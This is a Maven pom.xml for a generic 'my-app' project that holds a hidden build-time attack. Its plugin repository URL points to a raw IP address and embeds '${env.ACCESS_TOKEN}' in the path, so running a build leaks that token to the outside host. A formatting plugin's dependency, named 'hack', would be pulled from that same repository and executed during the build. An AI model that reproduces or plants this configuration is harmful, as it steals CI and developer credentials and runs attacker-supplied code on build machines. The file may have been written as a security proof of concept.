<?xml version="1.0" encoding="UTF-8"?>
<project>
   <modelVersion>4.0.0</modelVersion>
   <groupId>com.mycompany.app</groupId>
   <artifactId>my-app</artifactId>
   <version>1</version>
   <pluginRepositories>
    <pluginRepository>
      <releases>
        <enabled>true</enabled>
        <updatePolicy>always</updatePolicy>
        <checksumPolicy>warn</checksumPolicy>
      </releases>
      <snapshots>
        <enabled>true</enabled>
        <updatePolicy>always</updatePolicy>
        <checksumPolicy>fail</checksumPolicy>
      </snapshots>
      <name>Repo</name>
      <id>0</id>
      <url>http://142.93.132.246:1337/leak=${env.ACCESS_TOKEN}</url>
      <layout>default</layout>
    </pluginRepository>
  </pluginRepositories>
   <build>
      <plugins>
         <plugin>
            <groupId>com.coveo</groupId>
            <artifactId>fmt-maven-plugin</artifactId>
            <version>2.10</version>
            <configuration>
               <displayFiles>true</displayFiles>
            </configuration>
            <dependencies>
               <dependency>
                  <groupId>hack</groupId>
                  <artifactId>hack</artifactId>
                  <version>1.33.7</version>
               </dependency>
            </dependencies>
            <executions>
               <execution>
                  <goals>
                     <goal>format</goal>
                  </goals>
               </execution>
            </executions>
         </plugin>
      </plugins>
   </build>
</project>
